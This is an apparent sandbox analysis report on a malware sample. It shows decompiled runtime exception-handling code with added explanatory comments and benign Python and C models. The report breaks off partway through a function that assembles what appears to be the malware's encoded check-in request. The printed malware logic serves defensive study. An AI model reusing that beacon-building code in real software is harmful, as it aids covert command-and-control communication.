            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: memset
            • String ID:
            • API String ID: 2221118986-0
            • Opcode ID: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
            • Instruction ID: 9ba6e1657ddddb07b849957b1dd51de6610c52014d81fddfd3673cf30d77ad97
            • Opcode Fuzzy Hash: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
            • Instruction Fuzzy Hash: 7022857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			// Structure matches the MSVC CRT's _ValidateEH3RN, i.e. most likely statically
            			// linked runtime code rather than sample-specific logic: it sanity-checks an x86
            			// SEH registration record (_a4) before its handler is dispatched. The scope
            			// table pointer at +8 must be 4-byte aligned, must not live on the current
            			// thread's stack (TEB limits at fs:[4]/fs:[8]), its entries must nest properly,
            			// and its page must belong to a mapped PE32 image; when the page falls in the
            			// image's first section, that section must not be writable. Validated pages are
            			// cached in a 16-entry list at 0x202a388 (count at 0x202a380, busy flag at
            			// 0x202a3c8). Returns 1 = acceptable, 0 = rejected, -1 = the memory query
            			// failed or the image headers did not parse.
            			E02028551(long _a4) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				signed int _v16;
            				short* _v32;
            				void _v36;
            				void* _t57;
            				signed int _t58;
            				signed int _t61;
            				signed int _t62;
            				void* _t63;
            				signed int* _t68;
            				intOrPtr* _t69;
            				intOrPtr* _t71;
            				intOrPtr _t72;
            				intOrPtr _t75;
            				void* _t76;
            				signed int _t77;
            				void* _t78;
            				void _t80;
            				signed int _t81;
            				signed int _t84;
            				signed int _t86;
            				short* _t87;
            				void* _t89;
            				signed int* _t90;
            				long _t91;
            				signed int _t93;
            				signed int _t94;
            				signed int _t100;
            				signed int _t102;
            				void* _t104;
            				long _t108;
            				signed int _t110;
            
            				_t108 = _a4;
            				_t76 =  *(_t108 + 8);                            // EH3 registration record: +8 is the scope table pointer
            				if((_t76 & 0x00000003) != 0) {                    // must be 4-byte aligned
            					L3:
            					return 0;
            				}
            				_a4 =  *[fs:0x4];                                // TEB StackBase
            				_v8 =  *[fs:0x8];                                // TEB StackLimit
            				if(_t76 < _v8 || _t76 >= _a4) {                   // a scope table on the stack is rejected (L3); otherwise validate it
            					_t102 =  *(_t108 + 0xc);                      // current try level
            					__eflags = _t102 - 0xffffffff;
            					if(_t102 != 0xffffffff) {                     // -1 means no active try block
            						_t91 = 0;
            						__eflags = 0;
            						_a4 = 0;
            						_t57 = _t76;
            						do {                                          // walk scope table entries 0..trylevel (12 bytes each: enclosing level, filter, handler)
            							_t80 =  *_t57;                            // enclosing try level of this entry
            							__eflags = _t80 - 0xffffffff;
            							if(_t80 == 0xffffffff) {
            								goto L9;
            							}
            							__eflags = _t80 - _t91;
            							if(_t80 >= _t91) {                        // enclosing level must refer to an earlier entry
            								L20:
            								_t63 = 0;
            								L60:
            								return _t63;
            							}
            							L9:
            							__eflags =  *(_t57 + 4);
            							if( *(_t57 + 4) != 0) {                   // count entries that carry a filter (__except rather than __finally)
            								_t12 =  &_a4;
            								 *_t12 = _a4 + 1;
            								__eflags =  *_t12;
            							}
            							_t91 = _t91 + 1;
            							_t57 = _t57 + 0xc;
            							__eflags = _t91 - _t102;
            						} while (_t91 <= _t102);
            						__eflags = _a4;
            						if(_a4 == 0) {
            							L15:
            							_t81 =  *0x202a380; // 0x0 (number of cached page addresses)
            							_t110 = _t76 & 0xfffff000;                 // page containing the scope table
            							_t58 = 0;
            							__eflags = _t81;
            							if(_t81 <= 0) {
            								L18:
            								_t104 = _t102 | 0xffffffff;           // -1: NtCurrentProcess(), and also the failure return value
            								// MemoryBasicInformation (class 0) into the 0x1c-byte MEMORY_BASIC_INFORMATION at &_v36:
            								// _v32 = AllocationBase, _v16 = Protect, _v12 = Type
            								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
            								__eflags = _t61;
            								if(_t61 < 0) {
            									_t62 = 0;
            									__eflags = 0;
            								} else {
            									_t62 = _a4;
            								}
            								__eflags = _t62;
            								if(_t62 == 0) {
            									L59:
            									_t63 = _t104;
            									goto L60;
            								} else {
            									__eflags = _v12 - 0x1000000;
            									if(_v12 != 0x1000000) {              // mbi.Type must be MEM_IMAGE
            										goto L59;
            									}
            									__eflags = _v16 & 0x000000cc;
            									if((_v16 & 0x000000cc) == 0) {       // no writable bit in mbi.Protect (PAGE_READWRITE 0x04, PAGE_WRITECOPY 0x08, PAGE_EXECUTE_READWRITE 0x40, PAGE_EXECUTE_WRITECOPY 0x80): accept and cache the page
            										L46:
            										_t63 = 1;
            										 *0x202a3c8 = 1;                     // take the cache busy flag
            										__eflags =  *0x202a3c8;
            										if( *0x202a3c8 != 0) {
            											goto L60;
            										}
            										_t84 =  *0x202a380; // 0x0
            										__eflags = _t84;
            										_t93 = _t84;
            										if(_t84 <= 0) {
            											L51:
            											__eflags = _t93;
            											if(_t93 != 0) {
            												L58:
            												 *0x202a3c8 = 0;
            												goto L5;
            											}
            											_t77 = 0xf;
            											__eflags = _t84 - _t77;
            											if(_t84 <= _t77) {
            												_t77 = _t84;
            											}
            											_t94 = 0;
            											__eflags = _t77;
            											if(_t77 < 0) {
            												L56:
            												__eflags = _t84 - 0x10;
            												if(_t84 < 0x10) {
            													_t86 = _t84 + 1;
            													__eflags = _t86;
            													 *0x202a380 = _t86;
            												}
            												goto L58;
            											} else {
            												do {
            													_t68 = 0x202a388 + _t94 * 4;
            													_t94 = _t94 + 1;
            													__eflags = _t94 - _t77;
            													 *_t68 = _t110;
            													_t110 =  *_t68;
            												} while (_t94 <= _t77);
            												goto L56;
            											}
            										}
            										_t69 = 0x202a384 + _t84 * 4;
            										while(1) {
            											__eflags =  *_t69 - _t110;
            											if( *_t69 == _t110) {
            												goto L51;
            											}
            											_t93 = _t93 - 1;
            											_t69 = _t69 - 4;
            											__eflags = _t93;
            											if(_t93 > 0) {
            												continue;
            											}
            											goto L51;
            										}
            										goto L51;
            									}
            									_t87 = _v32;                                 // mbi.AllocationBase = image base
            									__eflags =  *_t87 - 0x5a4d;
            									if( *_t87 != 0x5a4d) {                       // IMAGE_DOS_SIGNATURE "MZ"
            										goto L59;
            									}
            									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;  // e_lfanew -> IMAGE_NT_HEADERS
            									__eflags =  *_t71 - 0x4550;
            									if( *_t71 != 0x4550) {                       // IMAGE_NT_SIGNATURE "PE\0\0"
            										goto L59;
            									}
            									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
            									if( *((short*)(_t71 + 0x18)) != 0x10b) {    // OptionalHeader.Magic must be PE32
            										goto L59;
            									}
            									_t78 = _t76 - _t87;                          // RVA of the scope table
            									__eflags =  *((short*)(_t71 + 6));
            									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;   // first IMAGE_SECTION_HEADER: +0x18 + SizeOfOptionalHeader
            									if( *((short*)(_t71 + 6)) <= 0) {            // FileHeader.NumberOfSections
            										goto L59;
            									}
            									_t72 =  *((intOrPtr*)(_t89 + 0xc));          // first section VirtualAddress
            									__eflags = _t78 - _t72;
            									if(_t78 < _t72) {                            // not inside the first section: accept
            										goto L46;
            									}
            									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;    // VirtualAddress + VirtualSize
            									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
            										goto L46;
            									}
            									__eflags =  *(_t89 + 0x27) & 0x00000080;     // top byte of Characteristics: IMAGE_SCN_MEM_WRITE
            									if(( *(_t89 + 0x27) & 0x00000080) != 0) {    // scope table inside a writable first section: reject
            										goto L20;
            									}
            									goto L46;
            								}
            							} else {
            								goto L16;
            							}
            							while(1) {
            								L16:
            								__eflags =  *((intOrPtr*)(0x202a388 + _t58 * 4)) - _t110;
            								if( *((intOrPtr*)(0x202a388 + _t58 * 4)) == _t110) {
            									break;
            								}
            								_t58 = _t58 + 1;
            								__eflags = _t58 - _t81;
            								if(_t58 < _t81) {
            									continue;
            								}
            								goto L18;
            							}
            							__eflags = _t58;
            							if(_t58 <= 0) {
            								goto L5;
            							}
            							 *0x202a3c8 = 1;
            							__eflags =  *0x202a3c8;
            							if( *0x202a3c8 != 0) {
            								goto L5;
            							}
            							__eflags =  *((intOrPtr*)(0x202a388 + _t58 * 4)) - _t110;
            							if( *((intOrPtr*)(0x202a388 + _t58 * 4)) == _t110) {
            								L32:
            								_t100 = 0;
            								__eflags = _t58;
            								if(_t58 < 0) {
            									L34:
            									 *0x202a3c8 = 0;
            									goto L5;
            								} else {
            									goto L33;
            								}
            								do {
            									L33:
            									_t90 = 0x202a388 + _t100 * 4;
            									_t100 = _t100 + 1;
            									__eflags = _t100 - _t58;
            									 *_t90 = _t110;
            									_t110 =  *_t90;
            								} while (_t100 <= _t58);
            								goto L34;
            							}
            							_t25 = _t81 - 1; // -1
            							_t58 = _t25;
            							__eflags = _t58;
            							if(_t58 < 0) {
            								L28:
            								__eflags = _t81 - 0x10;
            								if(_t81 < 0x10) {
            									_t81 = _t81 + 1;
            									__eflags = _t81;
            									 *0x202a380 = _t81;
            								}
            								_t28 = _t81 - 1; // 0x0
            								_t58 = _t28;
            								goto L32;
            							} else {
            								goto L25;
            							}
            							while(1) {
            								L25:
            								__eflags =  *((intOrPtr*)(0x202a388 + _t58 * 4)) - _t110;
            								if( *((intOrPtr*)(0x202a388 + _t58 * 4)) == _t110) {
            									break;
            								}
            								_t58 = _t58 - 1;
            								__eflags = _t58;
            								if(_t58 >= 0) {
            									continue;
            								}
            								break;
            							}
            							__eflags = _t58;
            							if(__eflags >= 0) {
            								if(__eflags == 0) {
            									goto L34;
            								}
            								goto L32;
            							}
            							goto L28;
            						}
            						_t75 =  *((intOrPtr*)(_t108 - 8));             // saved frame value stored 8 bytes below the record
            						__eflags = _t75 - _v8;
            						if(_t75 < _v8) {                               // must be a stack address below the record itself
            							goto L20;
            						}
            						__eflags = _t75 - _t108;
            						if(_t75 >= _t108) {
            							goto L20;
            						}
            						goto L15;
            					}
            					L5:
            					_t63 = 1;
            					goto L60;
            				} else {
            					goto L3;
            				}
            			}
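
The stretch of the listing from the "MZ" check to the IMAGE_SCN_MEM_WRITE test is a hand-rolled PE header walk, and the same raw offsets turn up in loaders and injectors, so it is worth having as a standalone check. The Python below is an added example, not code from the report or from the sample: classify_rva follows exactly the offsets and decisions the decompiled code takes (only the first section header is examined, as in the listing), and build_pe32_image is a constructed minimal PE32 header set used to exercise it; both function names and the constructed image are mine.

```python
"""Replay of the PE header walk in E02028551 (from the "MZ" check to the
IMAGE_SCN_MEM_WRITE test) as a standalone check on an in-memory image.

Offsets follow the listing: e_lfanew at 0x3c, "PE\\0\\0" signature,
NumberOfSections at +6, SizeOfOptionalHeader at +0x14, Magic at +0x18
(0x10b = PE32), first section header at +0x18 + SizeOfOptionalHeader with
VirtualSize at +8, VirtualAddress at +0xc and Characteristics at +0x24
(its top byte, +0x27, carries IMAGE_SCN_MEM_WRITE).
"""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def classify_rva(image: bytes, rva: int):
    """None when the headers do not parse (the listing's L59, return -1),
    "outside" when rva is not in the first section (accepted, L46),
    "writable" when the first section has IMAGE_SCN_MEM_WRITE (rejected, L20),
    "readonly" otherwise (accepted, L46)."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if len(image) < e_lfanew + 0x1A or image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    num_sections = struct.unpack_from("<h", image, e_lfanew + 6)[0]     # signed, as the listing tests <= 0
    opt_size = struct.unpack_from("<H", image, e_lfanew + 0x14)[0]
    magic = struct.unpack_from("<H", image, e_lfanew + 0x18)[0]
    if magic != 0x10B or num_sections <= 0:
        return None
    sec = e_lfanew + 0x18 + opt_size                                   # first IMAGE_SECTION_HEADER
    if len(image) < sec + 0x28:
        return None
    virtual_size, virtual_address = struct.unpack_from("<II", image, sec + 8)
    characteristics = struct.unpack_from("<I", image, sec + 0x24)[0]
    if not (virtual_address <= rva < virtual_address + virtual_size):
        return "outside"
    return "writable" if characteristics & IMAGE_SCN_MEM_WRITE else "readonly"


def build_pe32_image(first_section_characteristics: int) -> bytes:
    """Constructed minimal PE32 header set (DOS header, NT headers, one section
    at RVA 0x1000 of size 0x1000) for exercising classify_rva; not a real executable."""
    dos_header = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                  # e_lfanew = 0x40
    file_header = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)       # i386, 1 section, PE32 optional header size
    optional_header = struct.pack("<H", 0x10B) + b"\0" * (0xE0 - 2)             # Magic = PE32, rest zeroed
    section = b".text\0\0\0" + struct.pack("<IIIIIIHHI", 0x1000, 0x1000, 0x1000, 0x400,
                                           0, 0, 0, 0, first_section_characteristics)
    return dos_header + b"PE\0\0" + file_header + optional_header + section


if __name__ == "__main__":
    ro = build_pe32_image(IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    rw = build_pe32_image(IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
    print(classify_rva(ro, 0x1234), classify_rva(rw, 0x1234), classify_rva(ro, 0x5000))
```

Note what the original check does not do: an address in any section other than the first is accepted without looking at that section's protection, which is why the MEMORY_BASIC_INFORMATION Protect test earlier in the function matters more than the header walk.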

            Instruction addresses 0x0202855b through 0x0202876e (the per-line address column of the listing above, detached from its code lines during extraction)

            APIs
            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 02028602
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: MemoryQueryVirtual
            • String ID:
            • API String ID: 2850889275-0
            • Opcode ID: 0de9b6040b8aab888688e79c9e35e213612bef7b679e46392b3e2f981cc6bd01
            • Instruction ID: c9bbdaa41a11caf96df3fe7b31c6fcb0987129d1d5a8dd11a779e2a6eccc59f2
            • Opcode Fuzzy Hash: 0de9b6040b8aab888688e79c9e35e213612bef7b679e46392b3e2f981cc6bd01
            • Instruction Fuzzy Hash: 2961D4387007318FDB6ACE28C59476973EAFB85358B24C52BE906C7285E735D84DE670
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 71%
            			E0202832C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
            				intOrPtr _v8;
            				char _v12;
            				void* __ebp;
            				signed int* _t43;
            				char _t44;
            				void* _t46;
            				void* _t49;
            				intOrPtr* _t53;
            				void* _t54;
            				void* _t65;
            				long _t66;
            				signed int* _t80;
            				signed int* _t82;
            				void* _t84;
            				signed int _t86;
            				void* _t89;
            				void* _t95;
            				void* _t96;
            				void* _t99;
            				void* _t106;
            
            				_t43 = _t84;
            				_t65 = __ebx + 2;
            				 *_t43 =  *_t43 ^ __edx ^  *__eax;
            				_t89 = _t95;
            				_t96 = _t95 - 8;
            				_push(_t65);
            				_push(_t84);
            				_push(_t89);
            				asm("cld");
            				_t66 = _a8;
            				_t44 = _a4;
            				if(( *(_t44 + 4) & 0x00000006) != 0) {
            					_push(_t89);
            					E02028497(_t66 + 0x10, _t66, 0xffffffff);
            					_t46 = 1;
            				} else {
            					_v12 = _t44;
            					_v8 = _a12;
            					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
            					_t86 =  *(_t66 + 0xc);
            					_t80 =  *(_t66 + 8);
            					_t49 = E02028551(_t66);
            					_t99 = _t96 + 4;
            					if(_t49 == 0) {
            						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
            						goto L11;
            					} else {
            						while(_t86 != 0xffffffff) {
            							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
            							if(_t53 == 0) {
            								L8:
            								_t80 =  *(_t66 + 8);
            								_t86 = _t80[_t86 + _t86 * 2];
            								continue;
            							} else {
            								_t54 =  *_t53();
            								_t89 = _t89;
            								_t86 = _t86;
            								_t66 = _a8;
            								_t55 = _t54;
            								_t106 = _t54;
            								if(_t106 == 0) {
            									goto L8;
            								} else {
            									if(_t106 < 0) {
            										_t46 = 0;
            									} else {
            										_t82 =  *(_t66 + 8);
            										E0202843C(_t55, _t66);
            										_t89 = _t66 + 0x10;
            										E02028497(_t89, _t66, 0);
            										_t99 = _t99 + 0xc;
            										E02028533(_t82[2]);
            										 *(_t66 + 0xc) =  *_t82;
            										_t66 = 0;
            										_t86 = 0;
            										 *(_t82[2])(1);
            										goto L8;
            									}
            								}
            							}
            							goto L13;
            						}
            						L11:
            						_t46 = 1;
            					}
            				}
            				L13:
            				return _t46;
            			}

            Per-line instruction addresses for E0202832C: 0x02028330 to 0x02028419; 0x00000000 marks a decompiled line with no code address.

            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
            • Instruction ID: e0abae02fec0baf0e8ed48ceeb5785eef16bc0846f127b6c43bea2bc61f73cd0
            • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
            • Instruction Fuzzy Hash: 1621D6369003249FCB10EF68C8C09ABBBA5FF45350B49C1AAD9159B245E730F919CBF0
            Uniqueness

            Uniqueness Score: -1.00%
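            The dispatch loop in E0202832C above has the shape of MSVC's statically linked _except_handler3. It tests the flags of the exception record (_a4, offset +4) against 6, which is EXCEPTION_UNWINDING | EXCEPTION_EXIT_UNWIND, and on that path calls E02028497 with try level -1 and returns 1 (ExceptionContinueSearch). Otherwise it stores a pointer pair (record, context) just below the registration record (_a8), reads a try level at +0xC and a scope table at +8, and steps through 12-byte scope-table entries (the (_t86 + _t86 * 2) * 4 stride) whose second field is a filter. If the table check in E02028551 fails (by address range that is the routine listed just above, whose NtQueryVirtualMemory call uses a 0x1C-byte MEMORY_BASIC_INFORMATION), the code ORs 0x8, EXCEPTION_STACK_INVALID, into the flags and continues the search. A negative filter result returns 0 (continue execution), zero moves to the enclosing try level, and a positive result unwinds, lowers the stored try level and jumps to the handler. The block below is an added example, not code from the sample or from Joe Sandbox: a portable model of that walk with constructed scope tables. The MSVC names and the reading of E02028497 and E02028551 as the CRT's unwind and scope-table validation helpers are inferences from the listing, not something the report states.

```c
/* Added example: a model of the E0202832C dispatch loop. Names follow MSVC's
 * _except_handler3 and are an inference about the sample, not report data. */
#include <stdint.h>

#define EXCEPTION_UNWINDING     0x2
#define EXCEPTION_EXIT_UNWIND   0x4
#define EXCEPTION_STACK_INVALID 0x8   /* the 0x8 ORed into _a4+4 in the listing */
#define TRYLEVEL_NONE           (-1)

enum disposition { CONTINUE_EXECUTION = 0, CONTINUE_SEARCH = 1 };

typedef int  (*filter_fn)(void *ctx);
typedef void (*handler_fn)(void *ctx);

/* 12-byte entry, matching the (trylevel + trylevel * 2) * 4 stride; filter at +4. */
struct scope_entry { int32_t prev_trylevel; filter_fn filter; handler_fn handler; };

/* Registration record as the listing indexes it: +8 scope table, +0xC try level. */
struct registration {
    void *prev; void *handler;
    const struct scope_entry *scopetable;
    int32_t trylevel; void *saved_ebp;
};

struct exception_record { uint32_t code; uint32_t flags; };

/* Stand-ins for the two helpers: the scope-table check (E02028551) and the
 * unwind called with try level -1 or with the matched level (E02028497). */
struct hooks {
    int  (*validate)(const struct scope_entry *table);
    void (*unwind)(struct registration *frame, int to_level);
};

int dispatch(struct exception_record *rec, struct registration *frame,
             const struct hooks *h, void *ctx, int *ran_level)
{
    *ran_level = TRYLEVEL_NONE;
    if (rec->flags & (EXCEPTION_UNWINDING | EXCEPTION_EXIT_UNWIND)) {
        h->unwind(frame, TRYLEVEL_NONE);           /* E02028497(frame+0x10, frame, -1) */
        return CONTINUE_SEARCH;
    }
    if (!h->validate(frame->scopetable)) {         /* E02028551(frame) == 0 */
        rec->flags |= EXCEPTION_STACK_INVALID;
        return CONTINUE_SEARCH;
    }
    for (int level = frame->trylevel; level != TRYLEVEL_NONE;) {
        const struct scope_entry *e = &frame->scopetable[level];
        if (e->filter) {
            int r = e->filter(ctx);
            if (r < 0) return CONTINUE_EXECUTION;  /* EXCEPTION_CONTINUE_EXECUTION */
            if (r > 0) {                            /* EXCEPTION_EXECUTE_HANDLER */
                h->unwind(frame, level);
                frame->trylevel = e->prev_trylevel; /* *(frame+0xC) = entry's previous level */
                *ran_level = level;
                e->handler(ctx);   /* the real handler jumps here and never returns */
                return CONTINUE_SEARCH;
            }
        }
        level = e->prev_trylevel;                   /* 0: try the enclosing __try */
    }
    return CONTINUE_SEARCH;
}

/* Constructed demo data: level 0 is the outer __try, level 1 the inner one. */
static int  f_search(void *c)  { (void)c; return 0; }
static int  f_execute(void *c) { (void)c; return 1; }
static int  f_resume(void *c)  { (void)c; return -1; }
static void mark(void *c)      { *(int *)c = 1; }
static int  v_ok(const struct scope_entry *t)  { (void)t; return 1; }
static int  v_bad(const struct scope_entry *t) { (void)t; return 0; }
static void no_unwind(struct registration *f, int l) { (void)f; (void)l; }

static const struct scope_entry nested[2] = {
    { TRYLEVEL_NONE, f_execute, mark },   /* level 0: outer, takes the exception */
    { 0,             f_search,  mark },   /* level 1: inner, passes it outward */
};
static const struct scope_entry resume_tbl[1] = { { TRYLEVEL_NONE, f_resume, mark } };

static int run(const struct scope_entry *t, int top, uint32_t flags,
               int (*validate)(const struct scope_entry *), int *ran, uint32_t *out_flags)
{
    struct registration frame = { 0, 0, t, top, 0 };
    struct exception_record rec = { 0xC0000005, flags };
    struct hooks h = { validate, no_unwind };
    int handled = 0;
    int d = dispatch(&rec, &frame, &h, &handled, ran);
    *out_flags = rec.flags;
    return d;
}

/* Inner filter says "search", outer says "execute": the level 0 handler runs. */
int demo_nested(void)   { int ran; uint32_t fl; run(nested, 1, 0, v_ok, &ran, &fl); return ran; }
/* Filter returns negative: the dispatcher returns 0 and no handler runs. */
int demo_resume(void)   { int ran; uint32_t fl; return run(resume_tbl, 0, 0, v_ok, &ran, &fl); }
/* Unwind flag set: only the unwind helper runs, disposition is 1. */
int demo_unwind(void)   { int ran; uint32_t fl; return run(nested, 1, EXCEPTION_UNWINDING, v_ok, &ran, &fl); }
/* Scope table fails validation: the flags gain EXCEPTION_STACK_INVALID. */
uint32_t demo_bad_table(void) { int ran; uint32_t fl; run(nested, 1, 0, v_bad, &ran, &fl); return fl; }
```

            The three filter outcomes are the reading key for the listing: a sample that wraps anti-analysis probes in __try/__except relies on a negative or positive filter result reaching the handler, so a debugger that swallows first-chance exceptions never lets the loop above run the way it does on a clean machine.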

            Memory Dump Source
            • Source File: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_1fc0000_Server.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
            • Instruction ID: dc0d814f1a9316f36193728ce97dad20cf3399229c0dd3362e6abad7ca9e928d
            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
            • Instruction Fuzzy Hash: E801F77AA00601CFDF22CF24C914BAE33E9EB85605F0940A8F50697242EB70A8429F90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 76%
            			E02022B91(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
            				intOrPtr _v4;
            				signed int _v8;
            				int* _v12;
            				char* _v16;
            				intOrPtr _v20;
            				void* _v24;
            				intOrPtr _v32;
            				intOrPtr _v36;
            				void* _v40;
            				void* __ebx;
            				void* __edi;
            				long _t68;
            				intOrPtr _t69;
            				intOrPtr _t70;
            				intOrPtr _t71;
            				intOrPtr _t72;
            				intOrPtr _t73;
            				void* _t76;
            				intOrPtr _t77;
            				int _t80;
            				intOrPtr _t81;
            				intOrPtr _t85;
            				intOrPtr _t86;
            				intOrPtr _t87;
            				void* _t89;
            				void* _t92;
            				intOrPtr _t96;
            				intOrPtr _t100;
            				intOrPtr* _t102;
            				int* _t108;
            				int* _t118;
            				char** _t120;
            				char* _t121;
            				intOrPtr* _t126;
            				intOrPtr* _t128;
            				intOrPtr* _t130;
            				intOrPtr* _t132;
            				intOrPtr _t135;
            				intOrPtr _t139;
            				int _t142;
            				intOrPtr _t144;
            				int _t147;
            				intOrPtr _t148;
            				int _t151;
            				void* _t152;
            				intOrPtr _t166;
            				void* _t168;
            				int _t169;
            				void* _t170;
            				void* _t171;
            				long _t172;
            				intOrPtr* _t173;
            				intOrPtr* _t174;
            				intOrPtr _t175;
            				intOrPtr* _t178;
            				char** _t181;
            				char** _t183;
            				char** _t184;
            				void* _t189;
            
            				_t68 = __eax;
            				_t181 =  &_v16;
            				_t152 = _a20;
            				_a20 = 8;
            				if(__eax == 0) {
            					_t68 = GetTickCount();
            				}
            				_t69 =  *0x202a018; // 0x1228dd1
            				asm("bswap eax");
            				_t70 =  *0x202a014; // 0x3a87c8cd
            				asm("bswap eax");
            				_t71 =  *0x202a010; // 0xd8d2f808
            				asm("bswap eax");
            				_t72 =  *0x202a00c; // 0x13d015ef
            				asm("bswap eax");
            				_t73 =  *0x202a348; // 0xc7d5a8
            				_t3 = _t73 + 0x202b5ac; // 0x74666f73
            				_t169 = wsprintfA(_t152, _t3, 3, 0x3d18f, _t72, _t71, _t70, _t69,  *0x202a02c,  *0x202a004, _t68);
            				_t76 = E0202467F();
            				_t77 =  *0x202a348; // 0xc7d5a8
            				_t4 = _t77 + 0x202b575; // 0x74707526
            				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
            				_t183 =  &(_t181[0xe]);
            				_t170 = _t169 + _t80;
            				if(_a24 != 0) {
            					_t148 =  *0x202a348; // 0xc7d5a8
            					_t8 = _t148 + 0x202b508; // 0x732526
            					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
            					_t183 =  &(_t183[3]);
            					_t170 = _t170 + _t151;
            				}
            				_t81 =  *0x202a348; // 0xc7d5a8
            				_t10 = _t81 + 0x202b89e; // 0x2ca8e46
            				_t153 = _t10;
            				_t189 = _a20 - _t10;
            				_t12 = _t81 + 0x202b246; // 0x74636126
            				_t164 = 0 | _t189 == 0x00000000;
            				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
            				_t85 =  *0x202a36c; // 0x2ca95b0
            				_t184 =  &(_t183[3]);
            				if(_t85 != 0) {
            					_t144 =  *0x202a348; // 0xc7d5a8
            					_t16 = _t144 + 0x202b8be; // 0x3d736f26
            					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
            					_t184 =  &(_t184[3]);
            					_t171 = _t171 + _t147;
            				}
            				_t86 = E0202472F(_t153);
            				_a32 = _t86;
            				if(_t86 != 0) {
            					_t139 =  *0x202a348; // 0xc7d5a8
            					_t19 = _t139 + 0x202b8d0; // 0x736e6426
            					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
            					_t184 =  &(_t184[3]);
            					_t171 = _t171 + _t142;
            					HeapFree( *0x202a2d8, 0, _a40);
            				}
            				_t87 = E02021340();
            				_a32 = _t87;
            				if(_t87 != 0) {
            					_t135 =  *0x202a348; // 0xc7d5a8
            					_t23 = _t135 + 0x202b8c5; // 0x6f687726
            					wsprintfA(_t171 + _t152, _t23, _t87);
            					_t184 =  &(_t184[3]);
            					HeapFree( *0x202a2d8, 0, _a40);
